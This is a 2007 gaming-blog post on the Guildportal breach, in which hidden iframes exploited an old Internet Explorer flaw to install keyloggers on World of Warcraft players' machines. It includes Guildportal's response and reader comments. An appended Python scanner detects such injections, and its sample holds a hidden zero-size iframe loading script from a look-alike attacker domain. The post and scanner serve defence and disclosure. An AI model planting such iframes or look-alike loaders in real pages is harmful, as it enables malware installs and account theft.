Guildportal, keyloggers, and you
In the past week, you may have noticed an increase in complaints about hacked accounts on the forums. Why? Well, the popular guild-hosting website Guildportal was hacked -- the attackers added a bit of code exploiting an old Internet Explorer vulnerability (Microsoft had a patch available six months ago) to install a keylogger on visitors' systems. It was a brilliant move by the hackers, who managed to tap into a site visited by a massive number of WoW players -- the perfect place to steal account information. But I can't say it was very good for some of Guildportal's users, who logged on to World of Warcraft to find their characters completely naked next to an unfamiliar mailbox. However, this entire affair was very preventable. First off, Guildportal itself had a vulnerability that allowed hackers to insert the exploit that installed the keylogger. And then, in order for the keylogger to be installed, individuals visiting Guildportal had to be running a version of Internet Explorer that was 6 months out of date.
Guildportal has taken steps to prevent this from happening again, by patching their systems and banning traffic from China, where the attack originated. (According to Guildportal's response as reported on the forums and a commenter on Madness and Games identifying himself as Aaron Lewis of Guildportal.) But have you taken steps? In Blizzard's post on the subject, they point out Microsoft Security Bulletin MS06-055, released by Microsoft on September 26th, 2006. You can stop many potential keylogger threats by simply visiting Windows Update to download patches regularly -- or, even easier, by enabling Windows' Automatic Update feature. Either option would have resulted in your computer being protected from this vulnerability well before now.
Think your account has been compromised? GM Kaone offers some good instructions on how to rid your computer of keyloggers (it's a lengthy post but very informative) and then points you to their billing support department for account recovery. (Yes, it is important to get rid of the keylogger before having your account restored -- otherwise you'll end up right back where you started!) But be prepared for a wait -- the account recovery process isn't always fast.
See Guildportal's full response to its users after the jump.
Other recent security advisories:
Beware the cursor hack
Keep keyloggers away: New Microsoft hotfix available
More security warnings from Blizzard
Blizzard reminds us to be careful of keyloggers
[Via PlayNoEvil, with thanks to robodex for the forums link]
Via the forums:
Dear GuildPortal Members,
Over the past few days we have been fighting a brute force attack against our servers by multiple (10+) computers that we suspect are located in China. While we have secured the services and the problem is gone, we want to let you know, fully, what exactly happened.
The attacks were successful to an extent, in that they were able to modify content on many sites, injecting code into welcome messages that contained a hidden iframe. This frame would then load script into the user's browser that installed a keylogger.
This did not affect all guilds or all users. The users that were affected were running Internet Explorer on Windows with no virus protection installed.
We have been working very hard with Rackspace to identify the means the attackers used and to nullify their ability to continue, but our top priority was always to reverse the injections as soon as we possibly could. We don't expect or deserve any pity for missing sleep, to be sure, but please believe that we have been doing everything we can to first remove the malicious code from your sites and then remove their ability to do it again. Many times during this, we have brought GuildPortal completely down in order to prevent the spreading of the trojan while we removed the code that loaded it. The process the attackers used to do this was automated -- our ability to counter what they were doing was not.
We believe we have patched up the problem that made what they did possible. However, please, if you use Internet Explorer under Windows, install a virus scanner if you don't already have one. If you don't, odds are overwhelmingly in favor of you already being infected with something.
Blizzard has an excellent write-up on securing your computer here, as well as information on what to do in case your World of Warcraft account has been compromised at this link.
Over the next few days, we are conducting a full security audit of our entire infrastructure, to locate and eradicate any other even remotely possible security risks. We cannot promise a security problem will never happen again -- no more than Microsoft promises their operating systems or browsers will be completely secure and virus-free after a service pack release -- but we will call (and have been calling) on all of the resources we have at our disposal to secure every part of the site, and it is our top priority.
We apologize for any inconvenience and, as always, thank you very much for choosing GuildPortal as your guild's home on the web!
Filed under: Analysis / Opinion, Blizzard
Reader Comments (Page 1 of 1)
Ekrim Apr 7th 2007 4:04PM
Lessons to take away from this:
1) Keep your system patched and up-to-date.
2) Use Firefox.
3) When you wind up naked next to a mailbox, remember, it's because you did something stupid.
Jeff Powell Apr 7th 2007 4:11PM
My heart totally goes out to anyone who had their account hacked and lost their wow possessions. That would no doubt make a person physically ill.
At the same time, in reading this article and what it took in order to be hacked, if you are still using Internet Explorer in this day and age, you simply aren't paying attention. This isn't like some uber-geek in the know kind of thing because it's been written about on literally thousands of sites, major newspapers like the New York Post and the Wall Street Journal and even the United States Department of Homeland Defense explicitly tells people NOT to use this incredibly unsafe browser.
In this day and age you've got numerous free alternatives that are going to get rid of the vast majority of browser based exploits right there. A little called Firefox (getfirefox.com) will get you started on the right path.
After literally abandoning their browser efforts for 5+ years, Microsoft comes back with IE7 which admittedly is a much better browser but you only have to keep your eyes open to see how these exploits work and eventually you see that if you do things just a little differently, you don't have to suffer along with everyone else.
Another obvious thing about this recent exploit (like every single other WoW exploit) is that Mac users are completely immune to the exploit - period.
I worked for Microsoft for years and am a software developer and I should also mention that, for 99% of my daily work, I use a Mac. For me, it's the right tool for the job (including WoW) and I just feel terrible for these people getting hacked like that so I just wanted to mention the obvious things you can do to protect yourself by simply switching to a (my opinion) far superior browser like Firefox.
Michael Apr 7th 2007 8:04PM
Own a Mac -- case closed.
baloor Apr 7th 2007 8:49PM
"Use Firefox" is not an answer to every browser exploit. It also has a fair share of its own.
http://www.informationweek.com/security/showArticle.jhtml;jsessionid=BLIAXLSRKQ2FKQSNDLRSKHSCJUNN2JVN?articleID=198800640
Pointing people to hotfixes is good too, but until a larger portion of the Windows user market purchases a legitimate copy that can pass WGA and install Service Packs and maintain a current patched system, there will always be a large number of vulnerable users.
I spend a fair portion of every working day supporting users who have systems riddled with holes and would rather just reinstall "Uncle Joe's copy from teh intertubes" than fork out some cash and fix it for good.
robodex Apr 7th 2007 9:32PM
"Use Firefox is not an answer to every browser exploit. It also has a fair share of its own."
You're completely and utterly missing the point. Firefox does have issues of its own, but the people who do this--install keyloggers on WoW websites--don't target Firefox. At the moment, installing Firefox is the absolute best thing for people to do, as these people do not target it. The fact that there are holes in Firefox is completely irrelevant to this topic; the Chinafarmers don't target it because it's much easier to target people who haven't updated their machines in months. Firefox still has a relatively small marketshare, and until it gets bigger and more exploits are found for it, it is the browser to use if you don't want to get hacked. It's sorta like telling someone who drives a Civic that it'd be useless to buy a different car, because cars are stolen all the time--but the Civic is the most stolen car of them all.
Anyway, this practice is actually pretty rampant; my guild's website was hacked through a hole in our forum software with the same script that targeted unpatched versions of windows. We lost our MT, Main Healer, a mage and an offtank. Just goes to show how ruthless these people can be.
Cylntmoon Apr 10th 2007 1:37PM
I got hacked and Guildportal had nothing to do with it. I had to reload and when I keyed in my account info with Blizzard it got hijacked. Toons naked yes, but Blizz returned all my gear within 24 hours. A call to the billing dept to change account info, virus scan, and when an investigator became available he took 1 hour to research and return my stuff.
Oomfoofoo Apr 9th 2007 6:15PM
I'm shocked to hear of this 1st here. I am a guildportal customer/admin for my guild's site and was never notified of this by guildportal either thru: their web site's homepage, our guild site, or a personal e-mail. One would think they would pull out all the stops to let their customers and visitors know about this.
I'm completely disappointed in them.
Elizabeth Harper Apr 9th 2007 6:35PM
To the best of my knowledge, this didn't impact every site on Guildportal, and the message reprinted above was sent to the guild administrators of guilds that were affected by this. So if this didn't impact your guild's site, you might not have heard a word about it.
irishstu Apr 10th 2007 8:57AM
No messages were sent to Guild Administrators - the article reference was in the news list on the left, and pretty easy to miss. GP were very poor in informing people that they had been hit.
Aaron Lewis Apr 18th 2007 1:27PM
By default, whenever a new guild is created, GuildPortal adds the "GuildPortal News" content type to the guild's home page. Much easier to see and keep up to date on service announcements and the like. We know that many people remove that content item as soon as possible though by default it appears beneath the game-specific news that the guild plays, so it's really not that invasive, but it's understandable that people might not want anything but their own content displayed on their home page.
To get around that, we also have a system-wide message that scrolls along the top of the screen, and we had that active for a day, and it contained a link to the news item as well as a warning that anyone running IE on Windows make sure their system is updated. Although, with the ANI exploit, having your system patched is really not the defense it should be.
The technique they used on our end in order to inject the script into welcome messages has been completely secured from being used that way in the future, and since we're a two-person company, I'll admit with no small amount of shame that I simply missed the single configuration change that would have been necessary for their attacks to work in the first place. They spent a long time locating it and tailoring their attack specifically for GuildPortal (like buying the gui1dportal.com and guildporta1.com domains to host their scripts -- replacing L with 1, which is hard to spot in lowercase).
Massive kudos to Blizzard, of course, for working with users to get their items/accounts back. With all seriousness, please please keep your systems patched and do run a virus scanner. I know McAfee and Norton both actively blocked these things from running (why IE allows a remote script on a site you're not even visiting to install and run an executable is beyond me), and without those virus scanners many more would have been affected.
We've done our part on securing GuildPortal, and we're also taking a more proactive approach to notifying people of security updates having to do with browser vulnerabilities.
But everyone needs to be aware that GP isn't the only, nor even the first, vehicle that hackers (using this term loosely -- the hacker's creed is extinct) have used to spread these keyloggers. Check out this article and look at page two to see that a number of government health care sites and the Miami Dolphins site all experienced the very same thing, though the attack wasn't as tailored: http://computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=security&articleId=9016684. My point isn't to make GP look better, especially when the breach used was something that could have been prevented had I known more about Windows Server configuration 6 years ago, but that no matter where you go, you need to be secured, at the desktop level, against these kinds of attacks.
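As an added example, written from the site operator's side and not code from Guildportal or anyone in this thread, here is a scan that covers the two details described above: the hidden iframe injected into welcome messages (the GuildPortal letter) and the gui1dportal.com-style look-alike hosting domains (Aaron's comment). It walks stored welcome-message HTML and flags zero-size or CSS-hidden frames and any script/frame source whose host only matches the trusted domain after 1-for-l style character swaps. The trusted domain, the sample message and the helper names are assumptions for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the site's own hosting domain; a real deployment would list all of them.
TRUSTED_DOMAINS = {"guildportal.com"}
# Digit/symbol swaps used to build look-alike hosts; "1" for "l" is the one the page describes.
CONFUSABLES = str.maketrans({"1": "l", "0": "o", "|": "l"})
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def registrable(host):
    """Lower-case the host and drop a leading www. so both spellings compare equal."""
    host = host.lower()
    return host[4:] if host.startswith("www.") else host

def is_lookalike(host):
    """True when the host matches a trusted domain only after confusable characters are normalised."""
    h = registrable(host)
    return h not in TRUSTED_DOMAINS and h.translate(CONFUSABLES) in TRUSTED_DOMAINS

def is_hidden(attrs):
    """True for zero-size or CSS-hidden frames, the shape of the injected iframe."""
    sizes = {attrs.get(k, "").strip().rstrip("px") for k in ("width", "height")}
    return "0" in sizes or bool(HIDDEN_STYLE.search(attrs.get("style", "")))

class _Collector(HTMLParser):
    """Collects iframe/script tags that are hidden or load from a look-alike host."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = urlparse(src).hostname or ""   # relative sources have no host and are skipped
        hidden = tag == "iframe" and is_hidden(a)
        lookalike = bool(host) and is_lookalike(host)
        if hidden or lookalike:
            self.findings.append({"tag": tag, "src": src, "hidden": hidden, "lookalike": lookalike})

def scan_welcome_message(html):
    """Return a list of findings for one stored welcome message."""
    collector = _Collector()
    collector.feed(html)
    return collector.findings

# Constructed sample: a benign welcome message with one injected hidden frame.
SAMPLE_WELCOME = """<h1>Welcome to the guild!</h1><p>Raids Tue/Thu, 8pm server.</p>
<iframe src="http://gui1dportal.com/w.htm" width="0" height="0" frameborder="0"></iframe>
<script src="http://www.guildportal.com/js/site.js"></script>"""

if __name__ == "__main__":
    for finding in scan_welcome_message(SAMPLE_WELCOME):
        print(finding)
```

Run it over every stored welcome message after a restore to confirm the injections are gone, and keep the trusted-domain set in step with any CDN or mirror hosts the site legitimately uses.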